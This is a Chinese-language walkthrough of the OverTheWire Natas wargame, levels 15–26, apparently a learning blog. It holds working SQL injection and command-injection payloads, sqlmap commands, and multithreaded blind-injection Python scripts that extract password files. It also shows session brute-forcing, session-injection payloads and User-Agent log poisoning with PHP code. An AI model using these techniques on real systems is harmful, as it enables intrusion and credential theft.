level15
URL:http://natas15.natas.labs.overthewire.org
Username:natas15
Password:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J
源码
<?
/*
CREATE TABLE `users` (
`username` varchar(64) DEFAULT NULL,
`password` varchar(64) DEFAULT NULL
);
*/
if(array_key_exists("username", $_REQUEST)) {
$link = mysql_connect('localhost', 'natas15', '<censored>');
mysql_select_db('natas15', $link);
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
if(array_key_exists("debug", $_GET)) {
echo "Executing query: $query<br>";
}
$res = mysql_query($query, $link);
if($res) {
if(mysql_num_rows($res) > 0) {
echo "This user exists.<br>";
} else {
echo "This user doesn't exist.<br>";
}
} else {
echo "Error in query.<br>";
}
mysql_close($link);
} else {
?>
<form action="index.php" method="POST">
Username: <input name="username"><br>
<input type="submit" value="Check existence" />
</form>
<? } ?>
测试如下:
payload:index.php?debug=1&username=1" or 1 -- +
result:Executing query: SELECT * from users where username="1" or 1 -- "
This user exists.
注入语句成功,返回this user exists
所以这题考察的盲注,偷个懒不自己写脚本了,直接上sqlmap跑下。把burpsuite截获的请求包复制保存为natas16.txt。使用sqlmap的教程可以看《sqlmap学习笔记(一)》
python sqlmap.py -r natas16.txt --random-agent --dbms=mysql --level=3 -p username --current-db
python sqlmap.py -r natas16.txt --random-agent --dbms=mysql --level=3 -p username --threads=10 -D natas15 -T users -C username,password --dump
natas16 password:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh
level16
URL:http://natas16.natas.labs.overthewire.org
Username:natas16
Password:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh
源码:
<?
$key = "";
if(array_key_exists("needle", $_REQUEST)) {
$key = $_REQUEST["needle"];
}
if($key != "") {
if(preg_match('/[;|&`\'"]/',$key)) {
print "Input contains an illegal character!";
} else {
passthru("grep -i \"$key\" dictionary.txt");
}
}
?>
考察命令注入,过滤了字符 ; | & ` ’ " ,查看源码,发现与natas9、10相似,不过相对于10的过滤,这里加上了正则过滤,使得截断与正则过滤都不能使用。但在php中"$()"可以在引号中使用,所以我们可以构造内层的grep命令的正则匹配:
passthru("grep -i \"($grep ^a /etc/natas_webpass/natas17)wrong\" dictionary.txt");
如果password 的首字母为a,内层检索到内容,则返回不为空,与后面的查询连接起来,使外层检索变形,返回为空,则继续进行外层检索,会输出标志字符wrong或者其他内容。这其实和盲注的思路一样,因此可以构建脚本获取下一关密码。
grep支持正则,可以选定范围[0-9]、[a-z]、[A-Z],然后用二分法提升程序效率
passthru("grep-i \"($grep ^[0-9] /etc/natas_webpass/natas17)wrong\" dictionary.txt");
passthru("grep-i \"($grep ^[a-z] /etc/natas_webpass/natas17)wrong\" dictionary.txt");
passthru("grep-i \"($grep ^[A-Z] /etc/natas_webpass/natas17)wrong\" dictionary.txt");
附上代码:
# coding=utf-8
import requests
import time
def reg_char_range(passwd,auth,char_range):
for chars in char_range.keys():
payload = {'needle':'$(grep ^'+passwd+chars+' /etc/natas_webpass/natas17)wrong','submit':'Search'}
req = requests.get(url=url, auth=auth, params=payload)
if 'wrong' not in req.text:
return char_range[chars]
def findpass(passwd,chars,auth):
payload = {'needle': '$(grep ^'+passwd +'['+ chars+'] /etc/natas_webpass/natas17)wrong', 'submit': 'Search'}
req = requests.get(url=url, auth=auth, params=payload)
if 'wrong' not in req.text:
# print(chars)
return True
def binary_search_recursion(chars,passwd,auth):
# """二分查找---递归"""
n = len(chars)
if n<1:
return False
mid = len(chars)//2
# 与中间值比较
if findpass(passwd,chars[mid],auth):
passwd=passwd+chars[mid]
return passwd
# 去左边子序列查找
elif findpass(passwd,chars[:mid],auth):
return binary_search_recursion(chars[:mid], passwd,auth)
# 去右边子序列查找
else:
findpass(passwd, chars[mid+1:],auth)
return binary_search_recursion(chars[mid+1:], passwd, auth)
if __name__=='__main__':
start=time.time()
url = "http://natas16.natas.labs.overthewire.org/index.php"
auth=requests.auth.HTTPBasicAuth('natas16','WaIHEacj63wnNIBROHeqi3p9t0m5nhmh')
passwd = ""
char_range={"[0-9]":"0123456789","[a-z]":"abcdefghijklmnopqrstuvwxyz","[A-Z]":"ABCDEFGHIJKLMNOPQRSTUVWXYZ"}
for i in range(32): #password总长度32位
reg_chars = reg_char_range(passwd,auth, char_range)
# print(reg_chars)
passwd=binary_search_recursion(reg_chars,passwd, auth)
print(passwd)
end=time.time()
print('find passwd:%s ,cost time:%s'%(passwd,(end-start)))
执行结果:find passwd:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw ,cost time:173.7105748653412
其实二分法在编写测试代码时很常用,数量掌握二分法和多线程对提升运行效率有很大帮助。
没采用二分法的代码如下,耗时要多3倍多:
import requests
import time
start=time.time()
url = "http://natas16.natas.labs.overthewire.org/"
username = "natas16"
password= 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh'
au = requests.auth.HTTPBasicAuth(username,password)
ans=""
testCharacter="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
i=0
while i < len(testCharacter):
payload={'needle':'$(grep -E ^'+ans+testCharacter[i]+'.* /etc/natas_webpass/natas17)hello','submit':'Search'}
req = requests.get(url,auth=au,params=payload)
if 'hello' not in req.text:
ans+=testCharacter[i]
print(ans)
i=0
continue
i+=1
end=time.time()
print("find passwd:%s,cost time %s" %('ans',end-start))
写个多线程结合二分法获取密码的脚本,先补充grep命令执行结果:
[root@192 html]# grep -E \\S\{32\} pass.txt
8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
[root@192 html]# grep -E ^[0-9]\\S\{31\} pass.txt
8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
[root@192 html]# grep -E ^[0-5]\\S\{31\} pass.txt
[root@192 html]# grep -E ^\\S{1}[A-Z]\\S{30\} pass.txt
8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
根据上面的命令执行情况,我们可以对每一个位置的字符单独进行二分法筛选
附上代码:
# coding:utf-8
import time
import requests
import threading
import queue
import re
def get_payload(q,auth,result):
while not q.empty():
payload_dict=q.get()
chars=payload_dict['chars']
binary_search_recursion(payload_dict,auth,chars,result)
def findpass(payload,chars,auth,pos):
payload['needle']='$(grep -E \\\\S{%d}%s\\\\S{%d} /etc/natas_webpass/natas17)wrong' %(pos,'['+chars+']',31-pos)
req = requests.get(url=url, auth=auth, params=payload)
if 'wrong' not in req.text:
print(chars)
return True
def binary_search_recursion(payload_dict,auth,chars,result):
# """二分查找---递归"""
# chars=payload_dict['chars']
payload=payload_dict['payload']
# char_range=payload_dict['char_range']
pos=int(payload_dict['pos'])
n = len(chars)
if n<1:
return False
mid = len(chars)//2
# 与中间值比较
payload['needle'] = '$(grep -E \\\\S{%d}%s\\\\S{%d} /etc/natas_webpass/natas17)wrong' % (pos, '[' + chars[mid] + ']', 31 - pos)
req = requests.get(url=url, auth=auth, params=payload)
if 'wrong' not in req.text:
result[payload_dict['pos']]=chars[mid]
return result
# 去左边子序列查找
payload['needle'] = '$(grep -E \\\\S{%d}%s\\\\S{%d} /etc/natas_webpass/natas17)wrong' % (pos, '[' +chars[:mid]+ ']', 31-pos)
req = requests.get(url=url, auth=auth, params=payload)
if 'wrong' not in req.text:
return binary_search_recursion(payload_dict,auth,chars[:mid],result)
# 去右边子序列查找
else:
payload['needle'] = '$(grep -E \\\\S{%d}%s\\\\S{%d} /etc/natas_webpass/natas17)wrong' % (pos, '[' + chars[mid+1:] + ']', 31-pos)
req = requests.get(url=url, auth=auth, params=payload)
if 'wrong' not in req.text:
return binary_search_recursion(payload_dict,auth,chars[mid+1:],result)
if __name__=="__main__":
start=time.time()
threads=[]
threads_num=1
q=queue.Queue()
result={}
def reg_char_range(payload,url,auth):
req = requests.get(url=url, params=payload,auth=auth)
if 'wrong' not in req.text:
return payload
url = "http://natas16.natas.labs.overthewire.org/index.php"
auth=requests.auth.HTTPBasicAuth('natas16','WaIHEacj63wnNIBROHeqi3p9t0m5nhmh')
char_range = {'[0-9]': '0123456789', '[a-z]': 'abcdefghijklmnopqrstuvwxyz', '[A-Z]': 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'}
for i in range(32): #生成分别匹配0到32位的payload
i=int(i)
for payload_chars in char_range.keys():
payload= {'needle':'$(grep -E \\\\S{%d}%s\\\\S{%d} /etc/natas_webpass/natas17)wrong' %(i,payload_chars,31-i),'submit':'Search'}
res=reg_char_range(payload, url, auth)
if res:
payload_dict={'payload':res,'pos':i,'chars':char_range[payload_chars],'char_range':payload_chars}
print("payload dict:%s" %(payload_dict))
q.put(payload_dict)
break
for i in range(8):
t=threading.Thread(target=get_payload,args=(q,auth,result,))
threads.append(t)
for i in threads:
print(i)
i.start()
for i in threads:
i.join()
print(i)
print(result)
passwd=''
for i in sorted(result):
passwd=passwd+result[i]
end=time.time()
print("cost time:%s,passwd is %s" %(end-start,passwd))
8个线程,速度大幅提升,主要是前面生成payload耗时长了点,生成payload也可以加多线程
修改下代码,将前面生成payload也用多线程进行
# coding:utf-8
import time
import requests
import threading
import queue
import re
def get_payload(q,auth,result):
while not q.empty():
payload_dict=q.get()
chars=payload_dict['chars']
binary_search_recursion(payload_dict,auth,chars,result)
def findpass(payload,chars,auth,pos,result):
payload['needle']='$(grep -E \\\\S{%d}%s\\\\S{%d} /etc/natas_webpass/natas17)wrong' %(pos,'['+chars+']',31-pos)
req = requests.get(url=url, auth=auth, params=payload)
if 'wrong' not in req.text:
# print(chars)
return True
def binary_search_recursion(payload_dict,auth,chars,result):
# """二分查找---递归"""
payload=payload_dict['payload']
pos=int(payload_dict['pos'])
n = len(chars)
if n<1:
return False
mid = len(chars)//2
# 与中间值比较
if findpass(payload, chars[mid], auth, pos,result):
result[payload_dict['pos']]=chars[mid]
return result
# 去左边子序列查找
if findpass(payload, chars[:mid], auth, pos, result):
return binary_search_recursion(payload_dict,auth,chars[:mid],result)
# 去右边子序列查找
else:
if findpass(payload, chars[mid+1:], auth, pos, result):
return binary_search_recursion(payload_dict,auth,chars[mid+1:],result)
def reg_char_range(payload,url,auth):
req = requests.get(url=url, params=payload,auth=auth)
if 'wrong' not in req.text:
return payload
def make_payload(url,auth,char_range,q,q1):
# for i in range(32): #生成分别匹配0到32位的payload
# i=int(i)
while not q1.empty():
i=q1.get()
for payload_chars in char_range.keys():
payload= {'needle':'$(grep -E \\\\S{%d}%s\\\\S{%d} /etc/natas_webpass/natas17)wrong' %(i,payload_chars,31-i),'submit':'Search'}
res=reg_char_range(payload, url, auth)
if res:
payload_dict={'payload':res,'pos':i,'chars':char_range[payload_chars],'char_range':payload_chars}
print("payload dict:%s" %(payload_dict))
q.put(payload_dict)
# binary_search_recursion(payload_dict,auth,chars,result)
break
if __name__=="__main__":
start=time.time()
threads=[]
threads_num=8
q=queue.Queue()
q1=queue.Queue()
result={}
passwd = ''
ths=[]
url = "http://natas16.natas.labs.overthewire.org/index.php"
auth = requests.auth.HTTPBasicAuth('natas16', 'WaIHEacj63wnNIBROHeqi3p9t0m5nhmh')
char_range = {'[0-9]': '0123456789', '[a-z]': 'abcdefghijklmnopqrstuvwxyz', '[A-Z]': 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'}
for i in range(32):
q1.put(i)
for t in range(4):
t=threading.Thread(target=make_payload,args=(url, auth, char_range,q,q1,))
ths.append(t)
t.start()
for t in ths:
t.join()
print("make payload complete!")
for i in range(threads_num):
t=threading.Thread(target=get_payload,args=(q,auth,result,))
threads.append(t)
print('start get passwd!')
for i in threads:
i.start()
print(i)
for i in threads:
i.join()
print(i)
print('result dict complete!')
for i in sorted(result):
passwd=passwd+result[i]
end=time.time()
print("cost time:%s,passwd is %s" %(end-start,passwd))
耗时约36秒
level17
URL:http://natas17.natas.labs.overthewire.org
Username:natas17
Password:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
源码:
<?
/*
CREATE TABLE `users` (
`username` varchar(64) DEFAULT NULL,
`password` varchar(64) DEFAULT NULL
);
*/
if(array_key_exists("username", $_REQUEST)) {
$link = mysql_connect('localhost', 'natas17', '<censored>');
mysql_select_db('natas17', $link);
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
if(array_key_exists("debug", $_GET)) {
echo "Executing query: $query<br>";
}
$res = mysql_query($query, $link);
if($res) {
if(mysql_num_rows($res) > 0) {
//echo "This user exists.<br>";
} else {
//echo "This user doesn't exist.<br>";
}
} else {
//echo "Error in query.<br>";
}
mysql_close($link);
} else {
?>
数据库查询时,对传入的参数username的值未做过滤,存在注入。
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\"";
但是,没有任何返回提示,只能做基于时间的盲注
payload:index.php?debug=1&username=test" or 1 -- +
result:Executing query: SELECT * from users where username="test" or 1 -- "
提交payload,查看区别:
/index.php?debug=1&username=natas18111" and sleep(5) – +
提交错误的用户名,很快返回结果
/index.php?debug=1&username=natas18" and sleep(5) – +
提交正确的用户名,5秒以后返回结果
从源码中,我们已经获知数据库名为natas17,表名为users,该表存在username、password字段
ps:多线程虽然很快,但基于时间的还是难免会出错,我试了多次,线程数过高时,需要提高sleep的时间,以提高结果的准确性。
passwd is:xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP,cost time is 143.450834274292
多线程结合二分法基于时间的盲注python3脚本:
import requests
import time
import threading
import queue
start =time.time()
q=queue.Queue()
url = 'http://natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw@natas17.natas.labs.overthewire.org/index.php'
key = {}
passwd=''
threads_num=4
threads=[]
def findpass(q,url,key):
while not q.empty():
i=q.get()
print(i)
min = 32 #
max = 126 #
mid = (min + max) // 2
while min < max:
payload = r'natas18" and if(%d<ascii(mid(password,%d,1)),sleep(8),1) -- +' %(mid, i)
# print(payload)
try:
req = requests.post(url=url, data={"username": payload}, timeout=4)
except requests.exceptions.Timeout as e:
min = mid + 1
mid=(min+max)//2 #往大数方向寻找
continue
max = mid
mid = (min + max) // 2
key[i]=chr(mid)
for i in range(1, 33):
q.put(i)
for i in range(threads_num):
t=threading.Thread(target=findpass,args=(q,url,key,))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
for i in sorted(key):
passwd=passwd+key[i]
end=time.time()
print("passwd is:%s,cost time is %s" %(passwd,(end-start)))
level18
URL:http://natas18.natas.labs.overthewire.org
Username:natas18
Password:xvKIqDjy4OPv7wCRgDlmjPpFsCsDjhdP
源码:
<?
$maxid = 640; // 640 should be enough for everyone
function isValidAdminLogin() { /* {{{ */
if($_REQUEST["username"] == "admin") {
/* This method of authentication appears to be unsafe and has been disabled for now. */
//return 1;
}
return 0;
}
/* }}} */
function isValidID($id) { /* {{{ */
return is_numeric($id);
}
/* }}} */
function createID($user) { /* {{{ */
global $maxid;
return rand(1, $maxid);
}
/* }}} */
function debug($msg) { /* {{{ */
if(array_key_exists("debug", $_GET)) {
print "DEBUG: $msg<br>";
}
}
/* }}} */
function my_session_start() { /* {{{ */
if(array_key_exists("PHPSESSID", $_COOKIE) and isValidID($_COOKIE["PHPSESSID"])) {
if(!session_start()) {
debug("Session start failed");
return false;
} else {
debug("Session start ok");
if(!array_key_exists("admin", $_SESSION)) {
debug("Session was old: admin flag set");
$_SESSION["admin"] = 0; // backwards compatible, secure
}
return true;
}
}
return false;
}
/* }}} */
function print_credentials() { /* {{{ */
if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
print "You are an admin. The credentials for the next level are:<br>";
print "<pre>Username: natas19\n";
print "Password: <censored></pre>";
} else {
print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas19.";
}
}
/* }}} */
$showform = true;
if(my_session_start()) {
print_credentials();
$showform = false;
} else {
if(array_key_exists("username", $_REQUEST) && array_key_exists("password", $_REQUEST)) {
session_id(createID($_REQUEST["username"]));
session_start();
$_SESSION["admin"] = isValidAdminLogin();
debug("New session started");
$showform = false;
print_credentials();
}
}
if($showform) {
?>
当用户名为admin登陆,返回You are logged in as a regular user. Login as an admin to retrieve credentials for natas19.
没有获得natas19的密码,需要验证session,session范围是640以内的正整数。可以用burpsuite爆破
选择爆破字段
设置payload范围
根据长度不同,确定结果
result:
Username: natas19
Password: 4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs
level19
URL:http://natas19.natas.labs.overthewire.org
Username:natas19
Password:4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs
这一关和前一关一样,只是session值边长了,有18位,分析发现还是存在规律,前面6位数每两位的范围都是在30-40之间,同样用burpsuite爆破
分别设置3个位置的payload范围为30-40
最终结果:
Username: natas20,Password: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF
level20
URL:http://natas20.natas.labs.overthewire.org
Username: natas20
Password: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF
关键代码:
function myread($sid) {
debug("MYREAD $sid");
if(strspn($sid, "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM-") != strlen($sid)) {
debug("Invalid SID");
return "";
}
$filename = session_save_path() . "/" . "mysess_" . $sid;
if(!file_exists($filename)) {
debug("Session file doesn't exist");
return "";
}
debug("Reading from ". $filename);
$data = file_get_contents($filename);
$_SESSION = array();
foreach(explode("\n", $data) as $line) {
debug("Read [$line]");
$parts = explode(" ", $line, 2);
if($parts[0] != "") $_SESSION[$parts[0]] = $parts[1];
}
return session_encode();
}
explode() 函数把字符串分割为数组。
下面读文件的代码,首先以\n(换行符%oa)分割,后面用空格(%20)分割
$data = file_get_contents($filename);
$_SESSION = array();
foreach(explode("\n", $data) as $line) {
debug("Read [$line]");
$parts = explode(" ", $line, 2);
if($parts[0] != "") $_SESSION[$parts[0]] = $parts[1];
}
get提交dubug参数,打印debug信息
function debug($msg) { /* {{{ */
if(array_key_exists("debug", $_GET)) {
print "DEBUG: $msg<br>";
}
payload解析
payload: ?name=?test%0Aadmin%201&debug
foreach(explode("\n", $data) as $line) ==> [test,admin%201]
$parts = explode(" ", $line, 2); ==>[admin,1]
$_SESSION[$parts[0]] = $parts[1] ==>$_SESSION['admin']=1
result:
Username: natas21
Password: IFekPyrQXftziDEsUr3x21sYuahypdgJ
level21
URL:http://natas21.natas.labs.overthewire.org
Username: natas21
Password: IFekPyrQXftziDEsUr3x21sYuahypdgJ
提示:第21关网站与http://natas21-experimenter.natas.labs.overthewire.org共站
http://natas21.natas.labs.overthewire.org的源码:
<?
function print_credentials() { /* {{{ */
if($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1) {
print "You are an admin. The credentials for the next level are:<br>";
print "<pre>Username: natas22\n";
print "Password: <censored></pre>";
} else {
print "You are logged in as a regular user. Login as an admin to retrieve credentials for natas22.";
}
}
/* }}} */
session_start();
print_credentials();
?>
需要构造出
$SESSION
的字段包含admin ,$_SESSION[‘admin’]=1
http://natas21-experimenter.natas.labs.overthewire.org的源码:
<?
session_start();
// if update was submitted, store it
if(array_key_exists("submit", $_REQUEST)) {
foreach($_REQUEST as $key => $val) {
$_SESSION[$key] = $val;
}
}
if(array_key_exists("debug", $_GET)) {
print "[DEBUG] Session contents:<br>";
print_r($_SESSION);
}
// only allow these keys
$validkeys = array("align" => "center", "fontsize" => "100%", "bgcolor" => "yellow");
$form = "";
$form .= '<form action="index.php" method="POST">';
foreach($validkeys as $key => $defval) {
$val = $defval;
if(array_key_exists($key, $_SESSION)) {
$val = $_SESSION[$key];
} else {
$_SESSION[$key] = $val;
}
$form .= "$key: <input name='$key' value='$val' /><br>";
}
$form .= '<input type="submit" name="submit" value="Update" />';
$form .= '</form>';
$style = "background-color: ".$_SESSION["bgcolor"]."; text-align: ".$_SESSION["align"]."; font-size: ".$_SESSION["fontsize"].";";
$example = "<div style='$style'>Hello world!</div>";
?>
分析下面的代码,遍历提交的任意参数与参数值,并赋值给$_SESSION字典
if(array_key_exists("submit", $_REQUEST)) {
foreach($_REQUEST as $key => $val) {
$_SESSION[$key] = $val;
}
}
Username: natas22
Password: chG9fbe1Tq2eWVMgjYYD1MsfIvN461kJ
level22
URL:http://natas22.natas.labs.overthewire.org
Username: natas22
Password: chG9fbe1Tq2eWVMgjYYD1MsfIvN461kJ
源码:
<?
session_start();
if(array_key_exists("revelio", $_GET)) {
// only admins can reveal the password
if(!($_SESSION and array_key_exists("admin", $_SESSION) and $_SESSION["admin"] == 1)) {
header("Location: /");
}
}
?>
get提交的参数revelio存在,header()跳转,header(“Location: /”)中,header函数表示发送一个原始 Http Header到客户端,指定Location是进行重定向,/表示本地,即刷新。
<?
if(array_key_exists("revelio", $_GET)) {
print "You are an admin. The credentials for the next level are:<br>";
print "<pre>Username: natas23\n";
print "Password: <censored></pre>";
}
?>
只要构造get提交的参数revelio即可获取密码
Username: natas23
Password: D0vlad33nQF0Hz2EP255TP5wSW9ZsRSE
level23
URL:http://natas23.natas.labs.overthewire.org
Username: natas23
Password: D0vlad33nQF0Hz2EP255TP5wSW9ZsRSE
源码:
<?php
if(array_key_exists("passwd",$_REQUEST)){
if(strstr($_REQUEST["passwd"],"iloveyou") && ($_REQUEST["passwd"] > 10 )){
echo "<br>The credentials for the next level are:<br>";
echo "<pre>Username: natas24 Password: <censored></pre>";
}
else{
echo "<br>Wrong!<br>";
}
}
// morla / 10111
?>
strstr() 函数搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。构造一个passwd参数,参数值包含iloveyou,且剩余部分大于10,即可获得通关密码:
Username: natas24 Password: OsRmXFguozKpTZZ5X14zNO43379LZveg
level24
URL:http://natas24.natas.labs.overthewire.org
Username: natas24
Password: OsRmXFguozKpTZZ5X14zNO43379LZveg
源码:
<?php
if(array_key_exists("passwd",$_REQUEST)){
if(!strcmp($_REQUEST["passwd"],"<censored>")){
echo "<br>The credentials for the next level are:<br>";
echo "<pre>Username: natas25 Password: <censored></pre>";
}
else{
echo "<br>Wrong!<br>";
}
}
// morla / 10111
?>
strcmp(string1,string2)
strcmp()比较两个字符串(区分大小写)
本函数返回:
0 - 如果两个字符串相等
<0 - 如果 string1 小于 string2
>0 - 如果 string1 大于 string2
根据代码分析,提交的passwd的参数值要等于natas25的密码值,但是strcmp()存在漏洞,这一个漏洞适用与5.3之前版本的php,函数要求出入string类型的数据,但是当传入数组类型数据时,函数被报错,但是返回值为0,也就是说判定两值相等
Username: natas25 Password: GHF6X7YwACaYYssHVY05cFq83hRktl4c
level25
URL:http://natas25.natas.labs.overthewire.org
Username: natas25
Password: GHF6X7YwACaYYssHVY05cFq83hRktl4c
源码:
<?php
// cheers and <3 to malvina
// - morla
function setLanguage(){
/* language setup */
if(array_key_exists("lang",$_REQUEST))
if(safeinclude("language/" . $_REQUEST["lang"] ))
return 1;
safeinclude("language/en");
}
function safeinclude($filename){
// check for directory traversal
if(strstr($filename,"../")){
logRequest("Directory traversal attempt! fixing request.");
$filename=str_replace("../","",$filename);
}
// dont let ppl steal our passwords
if(strstr($filename,"natas_webpass")){
logRequest("Illegal file access detected! Aborting!");
exit(-1);
}
// add more checks...
if (file_exists($filename)) {
include($filename);
return 1;
}
return 0;
}
function listFiles($path){
$listoffiles=array();
if ($handle = opendir($path))
while (false !== ($file = readdir($handle)))
if ($file != "." && $file != "..")
$listoffiles[]=$file;
closedir($handle);
return $listoffiles;
}
function logRequest($message){
$log="[". date("d.m.Y H::i:s",time()) ."]";
$log=$log . " " . $_SERVER['HTTP_USER_AGENT'];
$log=$log . " \"" . $message ."\"\n";
$fd=fopen("/var/www/natas/natas25/logs/natas25_" . session_id() .".log","a");
fwrite($fd,$log);
fclose($fd);
}
?>
<h1>natas25</h1>
<div id="content">
<div align="right">
<form>
<select name='lang' onchange='this.form.submit()'>
<option>language</option>
<?php foreach(listFiles("language/") as $f) echo "<option>$f</option>"; ?>
</select>
</form>
</div>
<?php
session_start();
setLanguage();
echo "<h2>$__GREETING</h2>";
echo "<p align=\"justify\">$__MSG";
echo "<div align=\"right\"><h6>$__FOOTER</h6><div>";
?>
审计代码可知,strstr($ filename,“natas_webpass”)阻止我们直接访问natas_webpass目录,其次safeinclude()将目录遍历的“…/”替换成了“”。但我们可以双写对其进行绕过,其次在logRequest()中,日志信息保存有HTTP_USER_AGENT,我们可以利用GET请求获取日志文件,将user-agent字符串设置为<? readfile("/ect/natas_webpass/natas26")?>
,这样php代码写入日志文件。当我们通过设置lang=参数中目录遍历包含该日志文件时,日志文件中的代码<? readfile("/ect/natas_webpass/natas26")?>
被成功执行,返回natas26的密码oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T。
level26
URL:http://natas26.natas.labs.overthewire.org
Username: natas26
Password: oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T
未完待续